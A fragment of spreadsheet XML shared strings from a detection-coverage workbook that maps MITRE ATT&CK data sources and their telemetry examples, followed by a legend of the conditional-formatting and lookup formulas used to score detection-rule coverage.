    <t>Changes made to cloud storage infrastructure, including its settings and/or data (ex: AWS S3 PutObject or PutObjectAcl)</t>
  </si>
  <si>
    <t>Command</t>
  </si>
  <si>
    <t>DS0017</t>
  </si>
  <si>
    <t>Container, Host</t>
  </si>
  <si>
    <t>Android, Containers, Linux, Network, Windows, iOS, macOS</t>
  </si>
  <si>
    <t>A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command  Line)(Citation: Audit OSX)</t>
  </si>
  <si>
    <t>The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like &gt;dir, shell executions, etc. )</t>
  </si>
  <si>
    <t>Container</t>
  </si>
  <si>
    <t>DS0032</t>
  </si>
  <si>
    <t>A standard unit of virtualized software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another(Citation: Docker Docs Container)</t>
  </si>
  <si>
    <t>Container: Container Creation</t>
  </si>
  <si>
    <t>Initial construction of a new container (ex: docker create &lt;container_name&gt;)</t>
  </si>
  <si>
    <t>Container: Container Enumeration</t>
  </si>
  <si>
    <t>An extracted list of containers (ex: docker ps)</t>
  </si>
  <si>
    <t>Container: Container Start</t>
  </si>
  <si>
    <t>Activation or invocation of a container (ex: docker start or docker restart)</t>
  </si>
  <si>
    <t>Domain Name</t>
  </si>
  <si>
    <t>DS0038</t>
  </si>
  <si>
    <t>Information obtained (commonly through registration or activity logs) regarding one or more IP addresses registered with human readable names (ex: mitre.org)</t>
  </si>
  <si>
    <t>Domain Name: Active DNS</t>
  </si>
  <si>
    <t>Queried domain name system (DNS) registry data highlighting current domain to IP address resolutions (ex: dig/nslookup queries)</t>
  </si>
  <si>
    <t>Domain Name: Domain Registration</t>
  </si>
  <si>
    <t>Information about domain name assignments and other domain metadata (ex: WHOIS)</t>
  </si>
  <si>
    <t>Domain Name: Passive DNS</t>
  </si>
  <si>
    <t>Logged domain name system (DNS) data highlighting timelines of domain to IP address resolutions (ex: passive DNS)</t>
  </si>
  <si>
    <t>Domain Name: Threat Feed</t>
  </si>
  <si>
    <t>Sentinel's Threat Feed</t>
  </si>
  <si>
    <t>Drive</t>
  </si>
  <si>
    <t>DS0016</t>
  </si>
  <si>
    <t>Host</t>
  </si>
  <si>
    <t>A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter(Citation: Sysmon EID 9)</t>
  </si>
  <si>
    <t>Drive: Drive Access</t>
  </si>
  <si>
    <t>Opening of a data storage device with an assigned drive letter or mount point</t>
  </si>
  <si>
    <t>Drive: Drive Creation</t>
  </si>
  <si>
    <t>Initial construction of a drive letter or mount point to a data storage device</t>
  </si>
  <si>
    <t>Changes made to a drive letter or mount point of a data storage device</t>
  </si>
  <si>
    <t>Driver</t>
  </si>
  <si>
    <t>DS0027</t>
  </si>
  <si>
    <t>A computer program that operates or controls a particular type of device that is attached to a computer. Provides a software interface to hardware devices, enabling operating systems and other computer programs to access hardware functions without needing to know precise details about the hardware being used(Citation: IOKit Fundamentals)(Citation: Windows Getting Started Drivers)</t>
  </si>
  <si>
    <t>Driver: Driver Load</t>
  </si>
  <si>
    <t>Attaching a driver to either user or kernel-mode of a system (ex: Sysmon EID 6)</t>
  </si>
  <si>
    <t>Driver: Driver Metadata</t>
  </si>
  <si>
    <t>Contextual data about a driver and activity around it such as driver issues reporting or integrity (page hash, code) checking</t>
  </si>
  <si>
    <t>File</t>
  </si>
  <si>
    <t>DS0022</t>
  </si>
  <si>
    <t>A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media).(Citation: Microsoft File Mgmt)</t>
  </si>
  <si>
    <t>Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663)</t>
  </si>
  <si>
    <t>Initial construction of a new file (ex: Sysmon EID 11)</t>
  </si>
  <si>
    <t>File: File Deletion</t>
  </si>
  <si>
    <t>Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules)</t>
  </si>
  <si>
    <t>Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.</t>
  </si>
  <si>
    <t>Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)</t>
  </si>
  <si>
    <t>Firewall</t>
  </si>
  <si>
    <t>DS0018</t>
  </si>
  <si>
    <t>A network security system, running locally on an endpoint or remotely as a service (ex: cloud environment), that monitors and controls incoming/outgoing network traffic based on predefined rules(Citation: AWS Sec Groups VPC)</t>
  </si>
  <si>
    <t>Firewall: Firewall Disable</t>
  </si>
  <si>
    <t>Deactivation or stoppage of a cloud service (ex: Write/Delete entries within Azure Firewall Activity Logs)</t>
  </si>
  <si>
    <t>Firewall: Firewall Enumeration</t>
  </si>
  <si>
    <t>An extracted list of available firewalls and/or their associated settings/rules (ex: Azure Network Firewall CLI Show commands)</t>
  </si>
  <si>
    <t>Firewall: Firewall Metadata</t>
  </si>
  <si>
    <t>Contextual data about a firewall and activity around it such as name, policy, or status</t>
  </si>
  <si>
    <t>Firewall: Firewall Rule Modification</t>
  </si>
  <si>
    <t>Changes made to a firewall rule, typically to allow/block specific network traffic (ex: Windows EID 4950 or Write/Delete entries within Azure Firewall Rule Collection Activity Logs)</t>
  </si>
  <si>
    <t>Firmware</t>
  </si>
  <si>
    <t>DS0001</t>
  </si>
  <si>
    <t>Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI</t>
  </si>
  <si>
    <t>Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record)</t>
  </si>
  <si>
    <t>Group</t>
  </si>
  <si>
    <t>DS0036</t>
  </si>
  <si>
    <t>A collection of multiple user accounts that share the same access rights to the computer and/or network resources and have common security rights(Citation: Amazon IAM Groups)</t>
  </si>
  <si>
    <t>Group: Group Enumeration</t>
  </si>
  <si>
    <t>An extracted list of available groups and/or their associated settings (ex: AWS list-groups)</t>
  </si>
  <si>
    <t>Group: Group Metadata</t>
  </si>
  <si>
    <t>Contextual data about a group which describes group and activity around it, such as name, permissions, or user accounts within the group</t>
  </si>
  <si>
    <t>Group: Group Modification</t>
  </si>
  <si>
    <t>Changes made to a group, such as membership, name, or permissions (ex: Windows EID 4728 or 4732, AWS IAM UpdateGroup)</t>
  </si>
  <si>
    <t>Image</t>
  </si>
  <si>
    <t>DS0007</t>
  </si>
  <si>
    <t>A single file used to deploy a virtual machine/bootable disk into an on-premise or third-party cloud environment(Citation: Microsoft Image)(Citation: Amazon AMI)</t>
  </si>
  <si>
    <t>Image: Image Creation</t>
  </si>
  <si>
    <t>Initial construction of a virtual machine image (ex: Azure Compute Service Images PUT)</t>
  </si>
  <si>
    <t>Image: Image Deletion</t>
  </si>
  <si>
    <t>Removal of a virtual machine image (ex: Azure Compute Service Images DELETE)</t>
  </si>
  <si>
    <t>Image: Image Metadata</t>
  </si>
  <si>
    <t>Contextual data about a virtual machine image such as name, resource group, state, or type</t>
  </si>
  <si>
    <t>Image: Image Modification</t>
  </si>
  <si>
    <t>Changes made to a virtual machine image, including setting and/or control data (ex: Azure Compute Service Images PATCH)</t>
  </si>
  <si>
    <t>Instance</t>
  </si>
  <si>
    <t>DS0030</t>
  </si>
  <si>
    <t>A virtual server environment which runs workloads, hosted on-premise or by third-party cloud providers(Citation: Amazon VM)(Citation: Google VM)</t>
  </si>
  <si>
    <t>Instance: Instance Creation</t>
  </si>
  <si>
    <t>Initial construction of a new instance (ex: instance.insert within GCP Audit Logs)</t>
  </si>
  <si>
    <t>Instance: Instance Deletion</t>
  </si>
  <si>
    <t>Removal of an instance (ex: instance.delete within GCP Audit Logs)</t>
  </si>
  <si>
    <t>Instance: Instance Enumeration</t>
  </si>
  <si>
    <t>An extracted list of instances within a cloud environment (ex: instance.list within GCP Audit Logs)</t>
  </si>
  <si>
    <t>Instance: Instance Metadata</t>
  </si>
  <si>
    <t>Contextual data about an instance and activity around it such as name, type, or status</t>
  </si>
  <si>
    <t>Instance: Instance Modification</t>
  </si>
  <si>
    <t>Changes made to an instance, including its settings and/or control data (ex: instance.addResourcePolicies or instances.setMetadata within GCP Audit Logs)</t>
  </si>
  <si>
    <t>Instance: Instance Start</t>
  </si>
  <si>
    <t>Activation or invocation of an instance (ex: instance.start within GCP Audit Logs)</t>
  </si>
  <si>
    <t>Instance: Instance Stop</t>
  </si>
  <si>
    <t>Deactivation or stoppage of an instance (ex: instance.stop within GCP Audit Logs)</t>
  </si>
  <si>
    <t>Internet Scan</t>
  </si>
  <si>
    <t>DS0035</t>
  </si>
  <si>
    <t>Information obtained (commonly via active network traffic probes or web crawling) regarding various types of resources and servers connected to the public Internet</t>
  </si>
  <si>
    <t>Logged network traffic in response to a scan showing both protocol header and body values</t>
  </si>
  <si>
    <t>Internet Scan: Response Metadata</t>
  </si>
  <si>
    <t>Contextual data about an Internet-facing resource gathered from a scan, such as running services or ports</t>
  </si>
  <si>
    <t>Kernel</t>
  </si>
  <si>
    <t>DS0008</t>
  </si>
  <si>
    <t>A computer program, at the core of a computer OS, that resides in memory and facilitates interactions between hardware and software components(Citation: STIG Audit Kernel Modules)(Citation: Init Man Page)</t>
  </si>
  <si>
    <t>Kernel: Kernel Module Load</t>
  </si>
  <si>
    <t>An object file that contains code to extend the running kernel of an OS, typically used to add support for new hardware (as device drivers) and/or filesystems, or for adding system calls</t>
  </si>
  <si>
    <t>Logon Session</t>
  </si>
  <si>
    <t>DS0028</t>
  </si>
  <si>
    <t>Cloud Control Plane, Host, Network</t>
  </si>
  <si>
    <t>Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization(Citation: Microsoft Audit Logon Events)</t>
  </si>
  <si>
    <t>Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp)</t>
  </si>
  <si>
    <t>Contextual data about a logon session, such as username, logon type, access tokens (security context, user SIDs, logon identifiers, and logon SID), and any activity associated within it</t>
  </si>
  <si>
    <t>Malware Repository</t>
  </si>
  <si>
    <t>DS0004</t>
  </si>
  <si>
    <t>Information obtained (via shared or submitted samples) regarding malicious software (droppers, backdoors, etc.) used by adversaries</t>
  </si>
  <si>
    <t>Malware Repository: Malware Content</t>
  </si>
  <si>
    <t>Code, strings, and other signatures that compromise a malicious payload</t>
  </si>
  <si>
    <t>Contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information</t>
  </si>
  <si>
    <t>Malware Repository: Threat Feed</t>
  </si>
  <si>
    <t>Module</t>
  </si>
  <si>
    <t>DS0011</t>
  </si>
  <si>
    <t>Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries(Citation: Microsoft LoadLibrary)(Citation: Microsoft Module Class)</t>
  </si>
  <si>
    <t>Module: Module Load</t>
  </si>
  <si>
    <t>Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)</t>
  </si>
  <si>
    <t>Named Pipe</t>
  </si>
  <si>
    <t>DS0023</t>
  </si>
  <si>
    <t>Mechanisms that allow inter-process communication locally or over the network. A named pipe is usually found as a file and processes attach to it(Citation: Microsoft Named Pipes)</t>
  </si>
  <si>
    <t>Named Pipe: Named Pipe Metadata</t>
  </si>
  <si>
    <t>Contextual data about a named pipe on a system, including pipe name and creating process (ex: Sysmon EIDs 17-18)</t>
  </si>
  <si>
    <t>Network Share</t>
  </si>
  <si>
    <t>DS0033</t>
  </si>
  <si>
    <t>A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)(Citation: Microsoft NFS Overview)</t>
  </si>
  <si>
    <t>Network Share: Network Share Access</t>
  </si>
  <si>
    <t>Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145)</t>
  </si>
  <si>
    <t>Network Traffic</t>
  </si>
  <si>
    <t>DS0029</t>
  </si>
  <si>
    <t>Android, IaaS, Linux, Windows, iOS, macOS</t>
  </si>
  <si>
    <t>Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)</t>
  </si>
  <si>
    <t>Logged network traffic data showing both protocol header and body values (ex: PCAP)</t>
  </si>
  <si>
    <t>Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)</t>
  </si>
  <si>
    <t>Persona</t>
  </si>
  <si>
    <t>DS0021</t>
  </si>
  <si>
    <t>A malicious online profile representing a user commonly used by adversaries to social engineer or otherwise target victims</t>
  </si>
  <si>
    <t>Persona: Social Media</t>
  </si>
  <si>
    <t>Established, compromised, or otherwise acquired social media personas</t>
  </si>
  <si>
    <t>Pod</t>
  </si>
  <si>
    <t>DS0014</t>
  </si>
  <si>
    <t>A single unit of shared resources within a cluster, comprised of one or more containers(Citation: Kube Kubectl)(Citation: Kube Pod)</t>
  </si>
  <si>
    <t>Pod: Pod Creation</t>
  </si>
  <si>
    <t>Initial construction of a new pod (ex: kubectl apply|run)</t>
  </si>
  <si>
    <t>Pod: Pod Enumeration</t>
  </si>
  <si>
    <t>An extracted list of pods within a cluster (ex: kubectl get pods)</t>
  </si>
  <si>
    <t>Pod: Pod Modification</t>
  </si>
  <si>
    <t>Changes made to a pod, including its settings and/or control data (ex: kubectl set|patch|edit)</t>
  </si>
  <si>
    <t>Process</t>
  </si>
  <si>
    <t>DS0009</t>
  </si>
  <si>
    <t>Android, Linux, Windows, iOS, macOS</t>
  </si>
  <si>
    <t>Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads)</t>
  </si>
  <si>
    <t>Operating system function/method calls executed by a process</t>
  </si>
  <si>
    <t>Opening of a process by another process, typically to read memory of the target process (ex: Sysmon EID 10)</t>
  </si>
  <si>
    <t>The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe &gt; net use, etc.)</t>
  </si>
  <si>
    <t>Process: Process Metadata</t>
  </si>
  <si>
    <t>Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.</t>
  </si>
  <si>
    <t>Process: Process Modification</t>
  </si>
  <si>
    <t>Changes made to a process, or its contents, typically to write and/or execute code in the memory of the target process (ex: Sysmon EID 8)</t>
  </si>
  <si>
    <t>Process: Process Termination</t>
  </si>
  <si>
    <t>Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689)</t>
  </si>
  <si>
    <t>Scheduled Job</t>
  </si>
  <si>
    <t>DS0003</t>
  </si>
  <si>
    <t>Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)(Citation: Microsoft Tasks)</t>
  </si>
  <si>
    <t>Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>Initial construction of a new scheduled job (ex: Windows EID 4698 or /var/log cron logs)</t>
  </si>
  <si>
    <t>Scheduled Job: Scheduled Job Metadata</t>
  </si>
  <si>
    <t>Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.</t>
  </si>
  <si>
    <t>Scheduled Job: Scheduled Job Modification</t>
  </si>
  <si>
    <t>Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs)</t>
  </si>
  <si>
    <t>Script</t>
  </si>
  <si>
    <t>DS0012</t>
  </si>
  <si>
    <t>A file or stream containing a list of commands, allowing them to be launched in sequence(Citation: Microsoft PowerShell Logging)(Citation: FireEye PowerShell Logging)(Citation: Microsoft AMSI)</t>
  </si>
  <si>
    <t>Script: Script Execution</t>
  </si>
  <si>
    <t>The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.)</t>
  </si>
  <si>
    <t>Sensor Health</t>
  </si>
  <si>
    <t>DS0013</t>
  </si>
  <si>
    <t>Information from host telemetry providing insights about system status, errors, or other notable functional activity</t>
  </si>
  <si>
    <t>Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)</t>
  </si>
  <si>
    <t>Service</t>
  </si>
  <si>
    <t>DS0019</t>
  </si>
  <si>
    <t>A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in(Citation: Microsoft Services)(Citation: Linux Services Run Levels)</t>
  </si>
  <si>
    <t>Service: Service Creation</t>
  </si>
  <si>
    <t>Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs)</t>
  </si>
  <si>
    <t>Service: Service Metadata</t>
  </si>
  <si>
    <t>Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.</t>
  </si>
  <si>
    <t>Service: Service Modification</t>
  </si>
  <si>
    <t>Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs)</t>
  </si>
  <si>
    <t>Snapshot</t>
  </si>
  <si>
    <t>DS0020</t>
  </si>
  <si>
    <t>A point-in-time copy of cloud volumes (files, settings, etc.) that can be created and/or deployed in cloud environments(Citation: Microsoft Snapshot)(Citation: Amazon Snapshots)</t>
  </si>
  <si>
    <t>Snapshot: Snapshot Creation</t>
  </si>
  <si>
    <t>Initial construction of a new snapshot (ex: AWS create-snapshot)</t>
  </si>
  <si>
    <t>Snapshot: Snapshot Deletion</t>
  </si>
  <si>
    <t>Removal of a snapshot (ex: AWS delete-snapshot)</t>
  </si>
  <si>
    <t>Snapshot: Snapshot Enumeration</t>
  </si>
  <si>
    <t>An extracted list of snapshops within a cloud environment (ex: AWS describe-snapshots)</t>
  </si>
  <si>
    <t>Snapshot: Snapshot Metadata</t>
  </si>
  <si>
    <t>Contextual data about a snapshot, which may include information such as ID, type, and status</t>
  </si>
  <si>
    <t>Snapshot: Snapshot Modification</t>
  </si>
  <si>
    <t>Changes made to a snapshop, such as metadata and control data (ex: AWS modify-snapshot-attribute)</t>
  </si>
  <si>
    <t>User Account</t>
  </si>
  <si>
    <t>DS0002</t>
  </si>
  <si>
    <t>Cloud Control Plane, Container, Host</t>
  </si>
  <si>
    <t>A profile representing a user, device, service, or application used to authenticate and access resources</t>
  </si>
  <si>
    <t>An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log)</t>
  </si>
  <si>
    <t>Initial construction of a new account (ex: Windows EID 4720 or /etc/passwd logs)</t>
  </si>
  <si>
    <t>User Account: User Account Deletion</t>
  </si>
  <si>
    <t>Removal of an account (ex: Windows EID 4726 or /var/log access/authentication logs)</t>
  </si>
  <si>
    <t>User Account: User Account Metadata</t>
  </si>
  <si>
    <t>Contextual data about an account, which may include a username, user ID, environmental data, etc.</t>
  </si>
  <si>
    <t>Changes made to an account, such as permissions and/or membership in specific groups (ex: Windows EID 4738 or /var/log access/authentication logs)</t>
  </si>
  <si>
    <t>Volume</t>
  </si>
  <si>
    <t>DS0034</t>
  </si>
  <si>
    <t>Block object storage hosted on-premise or by third-party providers, typically made available to resources as virtualized hard drives(Citation: Amazon S3)(Citation: Azure Blob Storage)(Citation: Google Cloud Storage)</t>
  </si>
  <si>
    <t>Volume: Volume Creation</t>
  </si>
  <si>
    <t>Initial construction of a cloud volume (ex: AWS create-volume)</t>
  </si>
  <si>
    <t>Volume: Volume Deletion</t>
  </si>
  <si>
    <t>Removal of a a cloud volume (ex: AWS delete-volume)</t>
  </si>
  <si>
    <t>Volume: Volume Enumeration</t>
  </si>
  <si>
    <t>An extracted list of available volumes within a cloud environment (ex: AWS describe-volumes)</t>
  </si>
  <si>
    <t>Volume: Volume Metadata</t>
  </si>
  <si>
    <t>Contextual data about a cloud volume and activity around it, such as id, type, state, and size</t>
  </si>
  <si>
    <t>Volume: Volume Modification</t>
  </si>
  <si>
    <t>Changes made to a cloud volume, including its settings and control data (ex: AWS modify-volume)</t>
  </si>
  <si>
    <t>WMI</t>
  </si>
  <si>
    <t>DS0005</t>
  </si>
  <si>
    <t>The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers(Citation: Microsoft WMI System Classes)(Citation: Microsoft WMI Architecture)</t>
  </si>
  <si>
    <t>WMI: WMI Creation</t>
  </si>
  <si>
    <t>Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)</t>
  </si>
  <si>
    <t>Web Credential</t>
  </si>
  <si>
    <t>DS0006</t>
  </si>
  <si>
    <t>Credential material, such as session cookies or tokens, used to authenticate to web applications and services(Citation: Medium Authentication Tokens)(Citation: Auth0 Access Tokens)</t>
  </si>
  <si>
    <t>Web Credential: Web Credential Creation</t>
  </si>
  <si>
    <t>Initial construction of new web credential material (ex: Windows EID 1200 or 4769)</t>
  </si>
  <si>
    <t>An attempt by a user to gain access to a network or computing resource by providing web credentials (ex: Windows EID 1202)</t>
  </si>
  <si>
    <t>Windows Registry</t>
  </si>
  <si>
    <t>DS0024</t>
  </si>
  <si>
    <t>A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations(Citation: Microsoft Registry)</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>Opening a Registry Key, typically to read the associated value (ex: Windows EID 4656)</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>Initial construction of a new Registry Key (ex: Windows EID 4656 or Sysmon EID 12)</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Deletion</t>
  </si>
  <si>
    <t>Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12)</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14)</t>
  </si>
  <si>
    <t>Version:</t>
  </si>
  <si>
    <t>ATT&amp;CK v14.1 OCTOBER 31, 2023  -  OUTDATED</t>
  </si>
  <si>
    <t>Need to update to ATT&amp;CK v16.1 - October 31, 2024 - CURRENT</t>
  </si>
  <si>
    <t>Detection Rules MITRE Techniques, &amp; Data Sources Sheet's Column Headings</t>
  </si>
  <si>
    <t>Color</t>
  </si>
  <si>
    <t>Meaning</t>
  </si>
  <si>
    <t>User modification required?</t>
  </si>
  <si>
    <t>Static fields, strings or numbers</t>
  </si>
  <si>
    <t>No</t>
  </si>
  <si>
    <t>Calculated values, with formulas</t>
  </si>
  <si>
    <t>Columns (cells) that expect an input from the users</t>
  </si>
  <si>
    <t>Coverage Sheet</t>
  </si>
  <si>
    <t>Conditional Formatting Formula</t>
  </si>
  <si>
    <t>When the detection rules coverage of MITRE ATTACK technique's sub-technique is less than 10%</t>
  </si>
  <si>
    <t>(=IF(AND(ISNUMBER(B1),B1&gt;=0.001),1,0))</t>
  </si>
  <si>
    <t>When the detection rules coverage of MITRE ATTACK technique's sub-technique is more than 10%</t>
  </si>
  <si>
    <t>(=IF(AND(ISNUMBER(B1),B1&gt;=0.1),1,0))</t>
  </si>
  <si>
    <t>When the detection rules coverage of MITRE ATTACK technique's sub-technique is more than 20%</t>
  </si>
  <si>
    <t>(=IF(AND(ISNUMBER(B1),B1&gt;=0.2),1,0))</t>
  </si>
  <si>
    <t>When the detection rules coverage of MITRE ATTACK technique's sub-technique is more than 40%</t>
  </si>
  <si>
    <t>(=IF(AND(ISNUMBER(B1),B1&gt;=0.4),1,0))</t>
  </si>
  <si>
    <t>When the detection rules coverage of MITRE ATTACK technique's sub-technique is more than 60%</t>
  </si>
  <si>
    <t>(=IF(AND(ISNUMBER(B1),B1&gt;=0.6),1,0))</t>
  </si>
  <si>
    <t>When the detection rules coverage of MITRE ATTACK technique's sub-technique is more than 80%</t>
  </si>
  <si>
    <t>(=IF(AND(ISNUMBER(B1),B1&gt;=0.8),1,0))</t>
  </si>
  <si>
    <t>Strike</t>
  </si>
  <si>
    <t>When a technique is not applicable to your environment, and you add negative one in the Techniques sheets column name "detection rules modifier"</t>
  </si>
  <si>
    <t>(=IF(INDEX(INDIRECT("techniques[technique status]"),MATCH(A2,INDIRECT("techniques[name]"),0))="disabled",1,0))</t>
  </si>
  <si>
    <t>When you have have a detection rule active but no data source is available for the used technique</t>
  </si>
  <si>
    <t>(=IF(INDEX(INDIRECT("techniques[technique status]"),MATCH(A2,INDIRECT("techniques[name]"),0))="inconsistent",1,0))</t>
  </si>
  <si>
    <t>Range:</t>
  </si>
  <si>
    <t>Conditional formatting formula to be applicable only on the names (text) column</t>
  </si>
  <si>
    <t>(=$A$1:$A$200,$C$1:$C$200,$E$1:$E$200,$G$1:$G$200,$I$1:$I$200,$K$1:$K$200,$M$1:$M$200,$O$1:$O$200,$Q$1:$Q$200,$S$1:$S$200,$U$1:$U$200,$W$1:$W$200,$Y$1:$Y$200,$AA$1:$AA$200)</t>
  </si>
  <si>
    <t>Conditional formatting formula to be applicable only on the numeric (percentage) column</t>
  </si>
  <si>
    <t>(=$B$1:$B$200,$D$1:$D$200,$F$1:$F$200,$H$1:$H$200,$J$1:$J$200,$L$1:$L$200,$N$1:$N$200,$P$1:$P$200,$R$1:$R$200,$T$1:$T$200,$V$1:$V$200,$X$1:$X$200,$Z$1:$Z$200,$AB$1:$AB$200)</t>
  </si>
  <si>
    <t>Techniques Sheet</t>
  </si>
  <si>
    <t>When a technique is not applicable to your environment, and you add negative one in the detection rules modifier</t>
  </si>
  <si>
    <t>(=COUNTIF($P2,"disabled"))</t>
  </si>
  <si>
    <t>When you have have a detection rule active but no data source is available for the used technique.</t>
  </si>
  <si>
    <t>(=COUNTIF($P2,"inconsistent"))</t>
  </si>
  <si>
    <t>When a data source is available but no detection rule is active for the same technique.</t>
  </si>
  <si>
    <t>(=COUNTIF($P2,"no detect"))</t>
  </si>
  <si>
    <t>When you have have a detection rule active and a data source relevant to the technquer is also available.</t>
  </si>
  <si>
    <t>(=COUNTIF($P2,"detect"))</t>
  </si>
  <si>
    <t>Conditional formatting formula to be applicable on the whole sheet/table</t>
  </si>
  <si>
    <t>(=$A$2:$P$627)</t>
  </si>
  <si>
    <t>Sources Sheet</t>
  </si>
  <si>
    <t>When a data source is connected</t>
  </si>
  <si>
    <t>(=IF($C2="yes",1,0))</t>
  </si>
  <si>
    <t>Formula Used in Coverage Sheet</t>
  </si>
  <si>
    <t>{=IF(A2&lt;&gt;"",IF(INDEX(Techniques[Coverage],MATCH(A2,Techniques[Name],0))&gt;0,INDEX(Techniques[Coverage],MATCH(A2,Techniques[Name],0)),""),"")}</t>
  </si>
  <si>
    <t>Check if A2 is non-empty</t>
  </si>
  <si>
    <t>{=IF(A2&lt;&gt;"", ...)}</t>
  </si>
  <si>
    <t>This checks if cell A2 contains any text. If A2 is empty, the formula will return an empty string "". If A2 contains some text, the formula will continue to the next part.</t>
  </si>
  <si>
    <t>Lookup the corresponding 'Coverage' value:</t>
  </si>
  <si>
    <t>{INDEX(Techniques[Coverage],MATCH(A2,Techniques[Name],0))}</t>
  </si>
  <si>
    <t>Here, MATCH finds the position of the value in A2 within the Name column of the Techniques table. INDEX then retrieves the corresponding value from the Coverage column at the position specified by the MATCH function.</t>
  </si>
  <si>
    <t>Check if the 'Coverage' value is greater than 0</t>
  </si>
  <si>
    <t>{IF(INDEX(...) &gt; 0, INDEX(...), "")}</t>
  </si>
  <si>
    <t>The IF function checks if the Coverage value obtained from the INDEX function is greater than 0. If it is, the INDEX value is returned as the result of the formula. If it is not (meaning the value is 0 or negative), the formula returns an empty string "".</t>
  </si>
  <si>
    <t>Return the result or an empty string if A2 is empty:</t>
  </si>
  <si>
    <t>{=IF(A2&lt;&gt;"", IF(...), "")}</t>
  </si>
  <si>
    <t>The outer IF ensures that the entire formula results in an empty string if A2 was empty to start with, effectively making the formula return a result only if there is a value in A2 to match.</t>
  </si>
  <si>
    <t>From MITRE to Excel Conversion</t>
  </si>
  <si>
    <t xml:space="preserve">To remove leading spaces </t>
  </si>
  <si>
    <t>{=TRIM(A2)}</t>
  </si>
  <si>
    <t>To merge technique ID and technique name columns</t>
  </si>
  <si>
    <t>{=B2&amp;" ("&amp;A2&amp;")"}</t>
  </si>
  <si>
    <t>Month</t>
  </si>
  <si>
    <t>March</t>
  </si>
  <si>
    <t>April</t>
  </si>
  <si>
    <t>May</t>
  </si>
  <si>
    <t>June</t>
  </si>
  <si>
    <t>July</t>
  </si>
  <si>
    <t>August</t>
  </si>
  <si>
    <t>September</t>
  </si>
  <si>
    <t>October</t>
  </si>
  <si>
    <t>November</t>
  </si>
  <si>
    <t>December</t>
  </si>
  <si>
    <t>Standards</t>
  </si>
  <si>
    <t>Minimum Baseline</t>
  </si>
  <si>
    <t>Desired State</t>
  </si>
  <si>
    <t>Current Controls</t>
  </si>
  <si>
    <t>Tech#</t>
  </si>
  <si>
    <t>Collection Total</t>
  </si>
  <si>
    <t>Collection, Credential Access Total</t>
  </si>
  <si>
    <t>Command and Control Total</t>
  </si>
  <si>
    <t>Command and Control, Defense Evasion, Persistence Total</t>
  </si>
  <si>
    <t>Command and Control, Initial Access Total</t>
  </si>
  <si>
    <t>Credential Access Total</t>
  </si>
  <si>
    <t>Credential Access, Defense Evasion, Persistence Total</t>
  </si>
  <si>
    <t>Credential Access, Discovery Total</t>
  </si>
  <si>
    <t>Defense Evasion Total</t>
  </si>
  <si>
    <t>Defense Evasion, Discovery Total</t>
